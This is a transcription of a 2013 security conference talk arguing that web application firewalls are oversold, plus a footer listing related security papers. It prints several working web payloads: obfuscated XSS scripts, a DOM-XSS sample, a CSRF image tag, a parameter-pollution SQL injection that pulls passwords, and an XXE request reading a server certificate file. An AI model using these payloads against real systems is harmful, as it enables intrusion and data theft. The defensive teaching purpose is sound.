We protect you applications! No, you don t. Digicomp Hacking Day 2013 May 16 th 2013
|
|
- Derick Burns
- 8 years ago
- Views:
Transcription
1 We protect you applications! No, you don t Digicomp Hacking Day 2013 May 16 th 2013
2 Sven Vetsch Partner & CTO at Redguard AG Specialized in Application Security (Web, Web-Services, Mobile, ) Leader OWASP Switzerland / sven.vetsch@redguard.ch
3 Sven Vetsch Partner & CTO at Redguard AG Specialized in Application Security (Web, Web-Services, Mobile, ) Leader OWASP Switzerland / sven.vetsch@redguard.ch
4 Disclaimer This presentation is focused on classic WAF functionality so we won t get into Single-Sign- On, Content Injection and so on. All the views in this presentation are my own and not necessarily those of Redguard AG.
5 Outline WAF in numbers What do vendors tell you Bypassing techniques
6 I Intro
7 >80% of organizations were attacked successfully at least once in 2011 Perceptions About Network Security - Ponemon Institute Research Report, 2011
8 Companies hacked in 2012/2013
9 23% already experienced a data or system breach as a result of an application layer vulnerability WhiteHat Security Website Security Statistics Report May 2013
10 55.6% of all organizations use WAFs only 29% in banking WhiteHat Security Website Security Statistics Report May 2013
11 WAF Deployment by Industry Banking Financial Services Healthcare Retail Technology Monitoring and actively blocking attacks Currently only monitoring traffic Installing and/or configuration mode No WAF deployed Don't know WhiteHat Security Website Security Statistics Report May 2013
12 WAF usage after a breach Monitoring and actively blocking attacks 31% 38% Currently only monitoring traffic Installing and/or configuration mode 6% 6% 19% Don't know No WAF deployed WhiteHat Security Website Security Statistics Report May 2013
13 62% of attacks can be blocked by a WAF with default rule sets NT OBJECTives - Analyzing the Effectiveness of Web Application Firewalls 2011
14 Organizations with a Web Application Firewall deployed had 11% more vulnerabilities, resolved them 8% slower, 7% and had a lower remediation rate. WhiteHat Security Website Security Statistics Report May 2013
15 A WAF makes me less secure!?
16 Possible reasons: Insufficient global security processes Rules are not sufficient Not enough resources to manage the WAF WAFs are threated as if they could solve all problem WAFs are only in monitoring mode instead of blocking anything
17 A WAF is a tool, not a solution
18 Don t worry, there are also good news
19 By summing all these percentages up we could safely say that a WAF could feasible help mitigate the risk of at least 71% of all custom web application vulnerabilities WhiteHat Security Website Security Statistics Report May 2012
20 II Vendor Claims
21 Vendor Supplied Certificate [Product] guarantees security of web applications. 12 May 2013 Redguard AG Sven Vetsch 21
22 Vendor Supplied Certificate The [Company] Web Application Firewall quickly protects web servers from data breaches and websites from defacement without administrators waiting for clean code or even knowing how an application works. 12 May 2013 Redguard AG Sven Vetsch 22
23 Vendor Supplied Certificate Fully addresses PCI May 2013 Redguard AG Sven Vetsch 23
24 Vendor Supplied Certificate Data Security Standard v2 6.6 For public-facing web applications, address new threats and vulnerabilities on an ongoing basis and ensure these applications are protected against known attacks by either of the following methods: Fully addresses PCI 6.6 or automated Reviewing public-facing web applications via manual application vulnerability security assessment tools or methods, at least annually and after any changes Installing a web-application firewall in front of public-facing web applications 15 May 2013 Redguard AG Sven Vetsch sven.vetsch@redguard.ch 24
25 Vendor Supplied Certificate Because of its unique blend of HTML and XML security, the [Company] Web Application Firewall provides a full compliance solution for the PCI DSS sections 6.5 and 6.6, which mandate the implementation of a Web application firewall by June 30, May 2013 Redguard AG Sven Vetsch sven.vetsch@redguard.ch 25
26 Vendor Supplied Certificate Data Security Standard v2 6.5 Develop applications based onblend secure coding guidelines. Because of its unique of HTML andprevent XML common coding vulnerabilities in software development processes, to security, the [Company] Web Application Firewall include the following: [OWASP Top 10] provides a full compliance solution for the PCI DSS sections 6.5 and 6.6, which mandate the implementation of a Web application firewall by June 30, May 2013 Redguard AG Sven Vetsch sven.vetsch@redguard.ch 26
27 Vendor Supplied Certificate The [Product] offers you the following technical features:... Session fixation 15 May 2013 Redguard AG Sven Vetsch 27
28 Vendor Supplied Certificate The [Product] offers you the following technical features:... Session fixation 12 May 2013 Redguard AG Sven Vetsch 28
29 III Bypassing WAFs
30 Insecure Rules Let s take the following pseudo rule: if ($path == "/admin") { if ($ipaddr == $internal_ipaddr) [block request] else [allow request] }
31 Insecure Rules /admin WAF
32 Insecure Rules /../admin WAF
33 Insecure Rules "/admin" == "/admin" -> true "/../admin" == "/admin" -> false
34 XSS Obfuscation When non-security people talk about XSS <script>alert("xss");</script>
35 XSS Obfuscation When security people talk about XSS <script>alert(string.fromcharcode(88, 83,83));</script> <IMG SRC=javasc ript:a 08;ert('X& #83;S')>
36 XSS Obfuscation When appsec people talk about XSS <script> window[(+{}+[])[-~[]]+(![]+[])[-~- ~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[]) [-~[]]+(!![]+[])[+[]]](("XSS")) </script>
37 XSS Obfuscation When appsec people talk about XSS <script> [][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[] +!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+ [])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+ []]+([]+{})[+!![]]+(!![]+[])[+!![]]]((+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+ []+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]] +(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([] [[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+ []]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]] ((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[]) [+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+ ([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!! []+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+ [])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[]) [+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+ {})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[]) [+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+ </script> Try it yourself:
38 DOM-based XSS <!DOCTYPE html> <html> <body> Hello <span id="name"></span> <script> document.getelementbyid("name").innerhtml = document.location.hash.slice(1); </script> </body> </html>
39 DOM-based XSS <!DOCTYPE html> <html> <body> Hello <span id="name"></span> <script> document.getelementbyid("name").innerhtml = document.location.hash.slice(1); </script> </body> </html>
40 DOM-based XSS
41 DOM-based XSS src="x" onerror="alert(1)"/>
42 A XSS attack like the one showed never hits the server so screw your WAF
43 Cross-Site Request Forgery (CSRF) <img src= /buy? article=123 /> 2
44 Without understanding the application or modifying the HTTP response, a WAF can t protect against CSRF attacks.
45 11.2% of all application are vulnerable to CSRF attacks my experience would be more around 50% WhiteHat Security Website Security Statistics Report May 2013
46 HTTP Parameter Pollution (HPP) q=<script>&q=alert("xss")&q=</script>
47 HTTP Parameter Pollution (HPP) Technology Behavior Result ASP / ASP.NET ConcatenaJon id=1,2 PHP Last occurrence id=2 Java First occurrence id=1
48 HTTP Parameter Pollution (HPP) Let s have a look at the following simple pseudo rule against SQL Injection attacks: if $param_id.match(/.*select.*from.*/) [block request]
49 HTTP Parameter Pollution (HPP) id=123;select%201,password%20from%20 users;% id=123;&id=select%201&id=password%20from %20users;%20--
50 HTTP Parameter Pollution (HPP) id=123;&id=select%201&id=password%20from %20users;%20-- id = 123; id = select 1 id = password from users; -- -> 123; select 1,password from users; --
51 WAF rules are not platform independent
52 More things your WAF isn t good at Anti-Automation and process validation Understanding application logic Insufficient Authentication & Authorization Brute Force Attacks Session Fixation Anomaly Detection Improper Filesystem Permissions Securing client side running code
53 Hacking a WAF (for fun and profit) In the past, WAFs also suffered from vulnerabilities like: Filter Bypasses (a lot of them!!!) XSS in their web admin interface CSRF in their web admin interface Default SSH root passwords Information Disclosure about the LAN/DMZ Arbitrary remote command execution XML External Entity (XXE) Attacks
54 Hacking a WAF (for fun and profit) Example scenario based on ModSecurity XML External Entity (XXE) vulnerability CVE
55 Hacking a WAF (for fun and profit) WAF
56 Hacking a WAF (for fun and profit) WAF /etc/apache2/ssl/cert.pem
57 Hacking a WAF (for fun and profit) Request: <?xml version="1.0" encoding="iso "?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/apache2/ssl/cert.pem" >]><foo>&xxe;</foo> Response:
58 Hacking a WAF (for fun and profit) WAF
59 IV Wrap Up
60 WAFs Conclusion are good at least they can help you must be tuned by a trained professional can t compensate insecure code aren t an alternative to patching vulnerabilities can generate a lot of profit for vendors so be careful about what features you really need and how well they perform don t solve all your appsec problems
61 We should accept WAFs for what they really are: a method of increasing the cost of attacks, but not necessarily one that might repel every attacker. Ivan Ristic
62 Q & A
Where every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
More informationOut of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet March 8, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development
More informationAttack Vector Detail Report Atlassian
Attack Vector Detail Report Atlassian Report As Of Tuesday, March 24, 2015 Prepared By Report Description Notes cdavies@atlassian.com The Attack Vector Details report provides details of vulnerability
More information05.0 Application Development
Number 5.0 Policy Owner Information Security and Technology Policy Application Development Effective 01/01/2014 Last Revision 12/30/2013 Department of Innovation and Technology 5. Application Development
More informationHTTPParameter Pollution. ChrysostomosDaniel
HTTPParameter Pollution ChrysostomosDaniel Introduction Nowadays, many components from web applications are commonly run on the user s computer (such as Javascript), and not just on the application s provider
More information2,000 Websites Later Which Web Programming Languages are Most Secure?
2,000 Websites Later Which Web Programming Languages are Most Secure? Jeremiah Grossman Founder & Chief Technology Officer 2010 WhiteHat Security, Inc. WhiteHat Security Founder & Chief Technology Officer
More informationSecurity Research Advisory IBM inotes 9 Active Content Filtering Bypass
Security Research Advisory IBM inotes 9 Active Content Filtering Bypass Table of Contents SUMMARY 3 VULNERABILITY DETAILS 3 TECHNICAL DETAILS 4 LEGAL NOTICES 7 Active Content Filtering Bypass Advisory
More informationHow to achieve PCI DSS Compliance with Checkmarx Source Code Analysis
How to achieve PCI DSS Compliance with Checkmarx Source Code Analysis Document Scope This document aims to assist organizations comply with PCI DSS 3 when it comes to Application Security best practices.
More information(WAPT) Web Application Penetration Testing
(WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:
More informationWEB APPLICATION VULNERABILITY STATISTICS (2013)
WEB APPLICATION VULNERABILITY STATISTICS (2013) Page 1 CONTENTS Contents 2 1. Introduction 3 2. Research Methodology 4 3. Summary 5 4. Participant Portrait 6 5. Vulnerability Statistics 7 5.1. The most
More informationSTOPPING LAYER 7 ATTACKS with F5 ASM. Sven Müller Security Solution Architect
STOPPING LAYER 7 ATTACKS with F5 ASM Sven Müller Security Solution Architect Agenda Who is targeted How do Layer 7 attacks look like How to protect against Layer 7 attacks Building a security policy Layer
More informationCracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference
Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance
More informationWeb App Security Audit Services
locuz.com Professional Services Web App Security Audit Services The unsecured world today Today, over 80% of attacks against a company s network come at the Application Layer not the Network or System
More informationApplication Security in the Cloud with BIG-IP ASM
F5 White Paper Application Security in the Cloud with BIG-IP ASM Whether critical applications live in the cloud, in the data center, or in both, organizations need a strategic point of control for application
More informationWeb Application Attacks and Countermeasures: Case Studies from Financial Systems
Web Application Attacks and Countermeasures: Case Studies from Financial Systems Dr. Michael Liu, CISSP, Senior Application Security Consultant, HSBC Inc Overview Information Security Briefing Web Applications
More informationWHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
More informationPassing PCI Compliance How to Address the Application Security Mandates
Passing PCI Compliance How to Address the Application Security Mandates The Payment Card Industry Data Security Standards includes several requirements that mandate security at the application layer. These
More informationData Breaches and Web Servers: The Giant Sucking Sound
Data Breaches and Web Servers: The Giant Sucking Sound Guy Helmer CTO, Palisade Systems, Inc. Lecturer, Iowa State University @ghelmer Session ID: DAS-204 Session Classification: Intermediate The Giant
More informationWeb application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
More informationUsing Free Tools To Test Web Application Security
Using Free Tools To Test Web Application Security Speaker Biography Matt Neely, CISSP, CTGA, GCIH, and GCWN Manager of the Profiling Team at SecureState Areas of expertise: wireless, penetration testing,
More informationImperva Cloud WAF. How to Protect Your Website from Hackers. Hackers. *Bots. Legitimate. Your Websites. Scrapers. Comment Spammers
How to Protect Your from Hackers Web attacks are the greatest threat facing organizations today. In the last year, Web attacks have brought down businesses of all sizes and resulted in massive-scale data
More informationTesting the OWASP Top 10 Security Issues
Testing the OWASP Top 10 Security Issues Andy Tinkham & Zach Bergman, Magenic Technologies Contact Us 1600 Utica Avenue South, Suite 800 St. Louis Park, MN 55416 1 (877)-277-1044 info@magenic.com Who Are
More informationAdobe Systems Incorporated
Adobe Connect 9.2 Page 1 of 8 Adobe Systems Incorporated Adobe Connect 9.2 Hosted Solution June 20 th 2014 Adobe Connect 9.2 Page 2 of 8 Table of Contents Engagement Overview... 3 About Connect 9.2...
More informationKenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data
Kenna Platform Security A technical overview of the comprehensive security measures Kenna uses to protect your data V2.0, JULY 2015 Multiple Layers of Protection Overview Password Salted-Hash Thank you
More informationIntrusion detection for web applications
Intrusion detection for web applications Intrusion detection for web applications Łukasz Pilorz Application Security Team, Allegro.pl Reasons for using IDS solutions known weaknesses and vulnerabilities
More informationSecuring SharePoint 101. Rob Rachwald Imperva
Securing SharePoint 101 Rob Rachwald Imperva Major SharePoint Deployment Types Internal Portal Uses include SharePoint as a file repository Only accessible by internal users Company Intranet External Portal
More informationWeb Application Penetration Testing
Web Application Penetration Testing 2010 2010 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property. Will Bechtel William.Bechtel@att.com
More informationPCI-DSS and Application Security Achieving PCI DSS Compliance with Seeker
PCI-DSS and Application Security Achieving PCI DSS Compliance with Seeker www.quotium.com 1/14 Summary Abstract 3 PCI DSS Statistics 4 PCI DSS Application Security 5 How Seeker Helps You Achieve PCI DSS
More informationThe New PCI Requirement: Application Firewall vs. Code Review
The New PCI Requirement: Application Firewall vs. Code Review The Imperva SecureSphere Web Application Firewall meets the new PCI requirement for an application layer firewall. With the highest security
More informationHow To Fix A Web Application Security Vulnerability
Proposal of Improving Web Application Security in Context of Latest Hacking Trends RADEK VALA, ROMAN JASEK Department of Informatics and Artificial Intelligence Tomas Bata University in Zlin, Faculty of
More informationCreating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
More informationASL IT Security Advanced Web Exploitation Kung Fu V2.0
ASL IT Security Advanced Web Exploitation Kung Fu V2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: There is a lot more in modern day web exploitation than the good old alert( xss ) and union
More informationWeb Hacking Incidents Revealed: Trends, Stats and How to Defend. Ryan Barnett Senior Security Researcher SpiderLabs Research
Web Hacking Incidents Revealed: Trends, Stats and How to Defend Ryan Barnett Senior Security Researcher SpiderLabs Research Ryan Barnett - Background Trustwave Senior Security Researcher Web application
More informationMingyu Web Application Firewall (DAS- WAF) - - - All transparent deployment for Web application gateway
Mingyu Web Application Firewall (DAS- WAF) - - - All transparent deployment for Web application gateway All transparent deployment Full HTTPS site defense Prevention of OWASP top 10 Website Acceleration
More informationWeb Application Security Assessment and Vulnerability Mitigation Tests
White paper BMC Remedy Action Request System 7.6.04 Web Application Security Assessment and Vulnerability Mitigation Tests January 2011 www.bmc.com Contacting BMC Software You can access the BMC Software
More informationMagento Security and Vulnerabilities. Roman Stepanov
Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection
More informationCloud Security:Threats & Mitgations
Cloud Security:Threats & Mitgations Vineet Mago Naresh Khalasi Vayana 1 What are we gonna talk about? What we need to know to get started Its your responsibility Threats and Remediations: Hacker v/s Developer
More information1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications
1. Introduction 2. Web Application 3. Components 4. Common Vulnerabilities 5. Improving security in Web applications 2 What does World Wide Web security mean? Webmasters=> confidence that their site won
More informationWeb Application Report
Web Application Report This report includes important security information about your Web Application. Security Report This report was created by IBM Rational AppScan 8.5.0.1 11/14/2012 8:52:13 AM 11/14/2012
More informationIntegrating Security into the Application Development Process. Jerod Brennen, CISSP CTO & Principal Security Consultant, Jacadis
Integrating Security into the Application Development Process Jerod Brennen, CISSP CTO & Principal Security Consultant, Jacadis Agenda Seek First to Understand Source Code Security AppSec and SQA Analyzing
More informationFrom the Bottom to the Top: The Evolution of Application Monitoring
From the Bottom to the Top: The Evolution of Application Monitoring Narayan Makaram, CISSP Director, Security Solutions HP/Enterprise Security Business Unit Session ID: SP01-202 Session 2012 Classification:
More informationArrow ECS University 2015 Radware Hybrid Cloud WAF Service. 9 Ottobre 2015
Arrow ECS University 2015 Radware Hybrid Cloud WAF Service 9 Ottobre 2015 Get to Know Radware 2 Our Track Record Company Growth Over 10,000 Customers USD Millions 200.00 150.00 32% 144.1 16% 167.0 15%
More informationWeb Application Vulnerability Testing with Nessus
The OWASP Foundation http://www.owasp.org Web Application Vulnerability Testing with Nessus Rïk A. Jones, CISSP rikjones@computer.org Rïk A. Jones Web developer since 1995 (16+ years) Involved with information
More informationPCI Compliance - A Realistic Approach. Harshul Joshi, CISM, CISA, CISSP Director, Information Technology CBIZ MHM hjoshi@cbiz.com
PCI Compliance - A Realistic Approach Harshul Joshi, CISM, CISA, CISSP Director, Information Technology CBIZ MHM hjoshi@cbiz.com What What is PCI A global forum launched in September 2006 for ongoing enhancement
More informationBest Practices - Remediation of Application Vulnerabilities
DROISYS APPLICATION SECURITY REMEDIATION Best Practices - Remediation of Application Vulnerabilities by Sanjiv Goyal CEO, Droisys February 2012 Proprietary Notice All rights reserved. Copyright 2012 Droisys
More informationelearning for Secure Application Development
elearning for Secure Application Development Curriculum Application Security Awareness Series 1-2 Secure Software Development Series 2-8 Secure Architectures and Threat Modeling Series 9 Application Security
More informationWeb Intrusion Detection with ModSecurity. Ivan Ristic <ivanr@webkreator.com>
Web Intrusion Detection with ModSecurity Ivan Ristic Aim of This Talk Discuss the state of Web Intrusion Detection Introduce ModSecurity Introduce an open source web application
More informationSome Notes on Web Application Firewalls
Some Notes on Web Application Firewalls or Why You still Get Owned #whoami Member of Application Security Team, ERNW GmbH Contact: ERNW GmbH Frank Block Breslauer Str. 28 69124 Heidelberg Email: fblock@ernw.de
More informationIs Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
More informationEssential IT Security Testing
Essential IT Security Testing Application Security Testing for System Testers By Andrew Muller Director of Ionize Who is this guy? IT Security consultant to the stars Member of OWASP Member of IT-012-04
More informationASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION
ASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION V 2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: Learn the various attacks like sql injections, cross site scripting, command execution
More informationIT Security Conference Romandie - Barracuda Securely Publishing Web Application a field dedicated to expert only?
IT Security Conference Romandie - Barracuda Securely Publishing Web Application a field dedicated to expert only? Antoine Donzé Sales Engineer Switzerland & North Africa Mid-market organizations are increasingly
More informationCONTENTS. PCI DSS Compliance Guide
CONTENTS PCI DSS COMPLIANCE FOR YOUR WEBSITE BUILD AND MAINTAIN A SECURE NETWORK AND SYSTEMS Requirement 1: Install and maintain a firewall configuration to protect cardholder data Requirement 2: Do not
More informationHow To Ensure That Your Computer System Is Safe
Establishing a Continuous Process for PCI DSS Compliance Visa, MasterCard, American Express, and other payment card companies currently require all U.S. merchants accepting credit card payments to comply
More informationWeb application vulnerability statistics for 2010-2011
Web application vulnerability statistics for 2010-2011 SERGEY GORDEYCHIK DMITRY EVTEEV ALEXANDER ZAITSEV DENIS BARANOV SERGEY SCHERBEL ANNA BELIMOVA GLEB GRITSAI YURI GOLTSEV TIMUR YUNUSOV ILYA KRUPENKO
More informationNSFOCUS Web Application Firewall White Paper
White Paper NSFOCUS Web Application Firewall White Paper By NSFOCUS White Paper - 2014 NSFOCUS NSFOCUS is the trademark of NSFOCUS Information Technology Co., Ltd. NSFOCUS enjoys all copyrights with respect
More informationFINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES
Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that
More informationMean Time to Fix (MTTF) IT Risk s Dirty Little Secret Joe Krull, CPP, CISSP, IAM, CISA, A.Inst.ISP, CRISC, CIPP
Mean Time to Fix (MTTF) IT Risk s Dirty Little Secret Joe Krull, CPP, CISSP, IAM, CISA, A.Inst.ISP, CRISC, CIPP Presentation Overview Basic Application Security (AppSec) Fundamentals Risks Associated With
More informationWHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6
WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL Ensuring Compliance for PCI DSS 6.5 and 6.6 CONTENTS 04 04 06 08 11 12 13 Overview Payment Card Industry Data Security Standard PCI Compliance for Web Applications
More informationETHICAL HACKING 010101010101APPLICATIO 00100101010WIRELESS110 00NETWORK1100011000 101001010101011APPLICATION0 1100011010MOBILE0001010 10101MOBILE0001
001011 1100010110 0010110001 010110001 0110001011000 011000101100 010101010101APPLICATIO 0 010WIRELESS110001 10100MOBILE00010100111010 0010NETW110001100001 10101APPLICATION00010 00100101010WIRELESS110
More informationPenta Security 3rd Generation Web Application Firewall No Signature Required. www.gasystems.com.au
Penta Security 3rd Generation Web Application Firewall No Signature Required www.gasystems.com.au 1 1 The Web Presence Demand The Web Still Grows INTERNET USERS 2006 1.2B Internet Users - 18% of 6.5B people
More informationOWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair dave.wichers@owasp.
and Top 10 (2007 Update) Dave Wichers The Foundation Conferences Chair dave.wichers@owasp.org COO, Aspect Security dave.wichers@aspectsecurity.com Copyright 2007 - The Foundation This work is available
More informationPenetration from application down to OS
April 8, 2009 Penetration from application down to OS Getting OS access using IBM Websphere Application Server vulnerabilities Digitаl Security Research Group (DSecRG) Stanislav Svistunovich research@dsecrg.com
More informationDetecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008
Detecting Web Application Vulnerabilities Using Open Source Means OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008 Kostas Papapanagiotou Committee Member OWASP Greek Chapter conpap@owasp.gr
More informationThe Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions jburroughs@uk.ibm.com Agenda Current State of Web Application Security Understanding
More informationApplication Security Testing. Generic Test Strategy
Application Security Testing Generic Test Strategy Page 2 of 8 Contents 1 Introduction 3 1.1 Purpose: 3 1.2 Application Security Testing: 3 2 Audience 3 3 Test Strategy guidelines 3 3.1 Authentication
More information3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) anthonylai@owasp.org Open Web Application Security Project http://www.owasp.org
More informationAppDefend Application Firewall Overview
AppDefend Application Firewall Overview May 2014 Stephen Kost Chief Technology Officer Integrigy Corporation Agenda Web Application Security AppDefend Overview Q&A 1 2 3 4 5 Oracle EBS Web Architecture
More informationContemporary Web Application Attacks. Ivan Pang Senior Consultant Edvance Limited
Contemporary Web Application Attacks Ivan Pang Senior Consultant Edvance Limited Agenda How Web Application Attack impact to your business? What are the common attacks? What is Web Application Firewall
More informationJava Web Application Security
Java Web Application Security RJUG Nov 11, 2003 Durkee Consulting www.rd1.net 1 Ralph Durkee SANS Certified Mentor/Instructor SANS GIAC Network Security and Software Development Consulting Durkee Consulting
More informationTable of Contents. Page 2/13
Page 1/13 Table of Contents Introduction...3 Top Reasons Firewalls Are Not Enough...3 Extreme Vulnerabilities...3 TD Ameritrade Security Breach...3 OWASP s Top 10 Web Application Security Vulnerabilities
More informationWeb-Application Security
Web-Application Security Kristian Beilke Arbeitsgruppe Sichere Identität Fachbereich Mathematik und Informatik Freie Universität Berlin 29. Juni 2011 Overview Web Applications SQL Injection XSS Bad Practice
More informationWEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities
More informationSecurity Basics - Lessons From a Paranoid. Stuart Larsen Yahoo! Paranoids - Pentest
Security Basics Lessons From a Paranoid Stuart Larsen Yahoo! Paranoids Pentest Overview Threat Modeling Common Web Vulnerabilities Automated Tooling Modern Attacks whoami Threat Modeling Analyzing the
More informationSichere Webanwendungen mit Java
Sichere Webanwendungen mit Java Karlsruher IT- Sicherheitsinitiative 16.07.2015 Dominik Schadow bridgingit Patch fast Unsafe platform unsafe web application Now lets have a look at the developers OWASP
More information74% 96 Action Items. Compliance
Compliance Report PCI DSS 2.0 Generated by Check Point Compliance Blade, on July 02, 2013 11:12 AM 1 74% Compliance 96 Action Items Upcoming 0 items About PCI DSS 2.0 PCI-DSS is a legal obligation mandated
More informationWeb Application Hacking (Penetration Testing) 5-day Hands-On Course
Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Course Description Our web sites are under attack on a daily basis
More informationVisa U.S.A Cardholder Information Security Program (CISP) Payment Application Best Practices
This document is to be used to verify that a payment application has been validated against Visa U.S.A. Payment Application Best Practices and to create the Report on Validation. Please note that payment
More informationSQuAD: Application Security Testing
SQuAD: Application Security Testing Terry Morreale Ben Whaley June 8, 2010 Why talk about security? There has been exponential growth of networked digital systems in the past 15 years The great things
More informationWeb Application Security
Web Application Security Ng Wee Kai Senior Security Consultant PulseSecure Pte Ltd About PulseSecure IT Security Consulting Company Part of Consortium in IDA (T) 606 Term Tender Cover most of the IT Security
More informationThreat Modelling for Web Application Deployment. Ivan Ristic ivanr@webkreator.com (Thinking Stone)
Threat Modelling for Web Application Deployment Ivan Ristic ivanr@webkreator.com (Thinking Stone) Talk Overview 1. Introducing Threat Modelling 2. Real-world Example 3. Questions Who Am I? Developer /
More informationInformation Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified
Standard: Data Security Standard (DSS) Requirement: 6.6 Date: February 2008 Information Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified Release date: 2008-04-15 General PCI
More informationMANAGED SECURITY TESTING
MANAGED SECURITY TESTING SERVICE LEVEL COMPARISON External Network Testing (EVS) Scanning Basic Threats Penetration Testing Network Vulnerability Scan Unauthenticated Web App Scanning Validation Of Scan
More informationDFW INTERNATIONAL AIRPORT STANDARD OPERATING PROCEDURE (SOP)
Title: Functional Category: Information Technology Services Issuing Department: Information Technology Services Code Number: xx.xxx.xx Effective Date: xx/xx/2014 1.0 PURPOSE 1.1 To appropriately manage
More informationImplementation of Web Application Firewall
Implementation of Web Application Firewall OuTian 1 Introduction Abstract Web 層 應 用 程 式 之 攻 擊 日 趨 嚴 重, 而 國 內 多 數 企 業 仍 不 知 該 如 何 以 資 安 設 備 阻 擋, 仍 在 採 購 傳 統 的 Firewall/IPS,
More informationAttack and Penetration Testing 101
